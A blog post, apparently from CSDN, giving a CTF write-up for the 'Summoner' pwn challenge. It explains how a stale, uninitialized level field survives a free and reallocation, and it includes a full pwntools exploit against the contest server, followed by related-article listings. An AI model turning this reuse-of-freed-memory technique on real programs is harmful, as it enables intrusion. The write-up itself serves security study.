metasequoia :Summoner

最新推荐文章于 2025-05-22 06:44:09 发布
最新推荐文章于 2025-05-22 06:44:09 发布
阅读量286 收藏
点赞数
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/chennbnbnb/article/details/104414151
版权
本文探讨了一种利用结构体内存布局的漏洞进行攻击的方法。通过精心构造假的结构体实例并利用释放和重新分配过程中的缺陷,可以使程序进入预设的状态。文章详细展示了如何在特定条件下使level字段达到期望值,进而触发特定行为。此技术适用于pwn竞赛及安全研究。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在这里插入图片描述

结构体

struct Creature{
	char* name;
    unsigned int level;
};

思路

在这里插入图片描述

  • level为5时即可
    在这里插入图片描述

  • 但是写入限制了level只能为4

漏洞

在这里插入图片描述

  • 只释放了申请的name,然后把creature设为NULL,没有释放creature
  • 并且申请creature时没有清空level

在这里插入图片描述

  • 使用前没有初始化level, 可以现在name中写入一个假的creature,再释放,使得再次申请Craeture时level正好为之前的5

exp

from pwn import *
#context.log_level = 'debug'
context(os='linux', arch='amd64')
elf=ELF('./a.dms')
#sh=process('./a.dms')
sh=remote('ctf.metasequoia.tk', 29579)
#gdb.attach(sh)

def cmd(s):
	sh.recvuntil('> ')
	sh.sendline(s)

def summon(name):
	cmd('summon '+name)
	sh.recvuntil('"\n')

def release():
	cmd('release')
	sh.recvuntil('Released.\n')

def strike():
	cmd('strike')

fakeCreature='A'*8+p64(5)

summon(fakeCreature)
release()
summon('chh')
strike()

sh.interactive()
从pwn-summoner理解first fit
weixin_44864859的博客
07-06 376
本文主要为观看bili53448916889师傅讲解视频的学习笔记。 首先拖进ida中进行代码审计。以下是main函数的伪代码 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { const char *v3; // rsi char **v5; // [rsp+0h] [rbp-240h] unsigned int level; // [rsp+1Ch] [rbp-224h] void **v7; // [rsp+20h]
ctf-pwn:canary绕过
chennbnbnb的博客
01-19 3234
文章目录覆盖00字符读出canary原理利用条件漏洞代码编译选项EXP利用格式化字符串漏洞读出canary原理漏洞代码编译选项EXP逐字节猜解canary原理漏洞代码编译EXPSSP Leak原理 覆盖00字符读出canary 原理 canary的值设计为以0x00结尾,防止read,printf灯函数直接读出 通过栈溢出覆盖最低位的字节,从而获得canary 利用条件 存在read/pri...
buuoj Pwn writeup 206-210
yongbaoii的博客
08-31 530
206 ciscn_2019_c_3 一堆乱七八糟。 create 207 metasequoia_2020_summoner 208 linkctf_2018.7_babypie 209 wdb_2018_3rd_pesp 210 TWCTF_online_2019_asterisk_alloc
buuoj Pwn writeup 286-290
yongbaoii的博客
09-06 286
286 metasequoia_2020_blacksmith 287 secretHolder_hitcon_2016 288 pwnable_dubblesort 289 pwnable_applestore 290 xp0intctf_2018_tutorial1
Metasequoia 4.8.0:三维人物建模软件神器
资源摘要信息:"Tetraface Inc Metasequoia 4.8.0 是一款专业的三维模型设计软件,特别适合于人物建模或动物角色的创建。该软件提供了一系列的专业工具和解决方案,使用户能够高效地进行三维设计工作,而无需安装多个...
Metasequoia 4.6.5 中文版:全面解析3D建模神器
Metasequoia 4.6.5是一款由日本开发者O.Mizno先生开发的3D建模软件,它体积小巧但功能强大,可用于游戏开发、三维图形设计等领域。在3D建模领域,Metasequoia以其易用性、强大的功能以及高可移植性而著称。...
水杉软件 Metasequoia 汉化中文版
05-19
Metasequoia是基于多边形建模创建使用CAD和3DCG,如游戏制作的三性维形状数据。重视效率和数据的可移植,可以使用范围很广,从爱好到业务。 1、强大的建模功能 水杉具有基本的多边形编辑功能。它还具有协助更精细...
Metasequoia 2.4.8 繁体版发布:专为繁体用户服务
在探讨“Metasequoia 2.4.8 繁体版”相关知识点前,需要说明的是Metasequoia是一款在三维建模领域知名的软件,尤其是对于动漫、游戏及虚拟模型创作爱好者而言。它是由日本Tatsuo Izawa开发的一款3D建模软件,特别...
日本3D水杉建模工具 Metasequoia 4.6.5 + x64 中文汉化版.zip
03-22
Metasequoia 又称水杉建模,这是一款体积小巧的3D建模软件,由O.Mizno先生开发,可以用于一些游戏中的三维形状数据制作等等,并拥有强大的可移植功能,是3D建模不可多得的一款工具。Metasequoia 是适用于 Windows 或...
如何从libc地址得到栈地址
chennbnbnb的博客
01-19 2494
在libc中保存了一个函数叫_environ,存的是当前进程的环境变量 得到libc地址后,libc基址+_environ的偏移量=_environ的地址 在内存布局中,他们同属于一个段,开启ASLR之后相对位置不变,偏移量之和libc库有关 通过_environ的地址得到_environ的值,从而得到环境变量地址,环境变量保存在栈中,所以通过栈内的偏移量,可以访问栈中任意变量 ...
scanf源码分析
chennbnbnb的博客
12-02 1425
本文分析的是glibc2.31中的scanf相关源码,目的不是研究scanf的算法,而是说明scanf在IO attack中的利用方法,属于CTF的范畴 scanf.c 其实就是对__vscanf_internal的封装 __scanf (const char *format, ...) { va_list arg; int done; va_start (arg, format); done = __vfscanf_internal (stdin, format, arg, 0)
栈迁移/栈劫持
chennbnbnb的博客
01-30 1053
例子 https://github.com/scwuaptx/HITCON-Training/tree/master/LAB/lab6 #include <stdio.h> #include <stdlib.h> #include <unistd.h> int count = 1337 ; int main(){ if(count != 13...
ASLR与PIE
chennbnbnb的博客
01-14 897
全称 ASLR:Address Space Layout Randomization PIE:Position Independent Executables 作用 ASLR:随机放置关键数据的地址空间,放置攻击者跳转到内存特定位置 PIE:生成相对寻址的位置无关的可执行程序 谁实现? ASLR:操作系统 cat /proc/sys/kernel/randomize_va_space:...
linux系统调用
chennbnbnb的博客
01-19 227
系统调用过程 32位 64位 系统调用号表 格式: #define __NR_名字 number 32位 cat /usr/include/asm/unistd_32.h #ifndef _ASM_X86_UNISTD_32_H #define _ASM_X86_UNISTD_32_H 1 #define __NR_restart_syscall 0 #define __NR_ex...
WEB安全--Java安全--shiro550反序列化漏洞
m0_74800552的博客
05-16 616
shiro550反序列化
移动安全与API安全
最新发布
2402_86373248的博客
05-22 560
通过本部分学习,将掌握移动应用逆向工程、API接口漏洞挖掘与防护的核心技能,覆盖从客户端到服务端的全链路攻防能力。:参与HackTheBox中Mobile/API类靶机(如“SecretAPI”)使用Burp Suite测试API接口的IDOR漏洞(越权访问他人订单):Hook网络库(OkHttp/Retrofit)获取加密前的原始请求。启用WAF(如Cloudflare API Shield):遵循GDPR/PCI DSS对API数据流动的加密规范。:强类型Schema(如JSON Schema)
网络安全-等级保护(等保) 2-7-4 GB/T 25058—2019 第8章 安全运行与维护 第9章 定级对象终止
项目管理到售前,一路成长的伙伴!
05-19 1195
根据不同的安全保护等级要求的控制粒度,分析所需要运行管理控制内容,并以此定义不同运行管 理角色的职责。
TDengine 安全部署配置建议
TDengine(老段)专注时序数据库领域
05-19 1144
数据安全是 TDengine 产品的一项关键指标,这些措施旨在保护 TDengine 部署免受未经授权的访问和数据泄露,同时保持性能和功能。但 TDengine 自身的安全配置不是生产中的唯一保障,结合用户业务系统制定更加匹配客户需求的解决方案更加重要。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值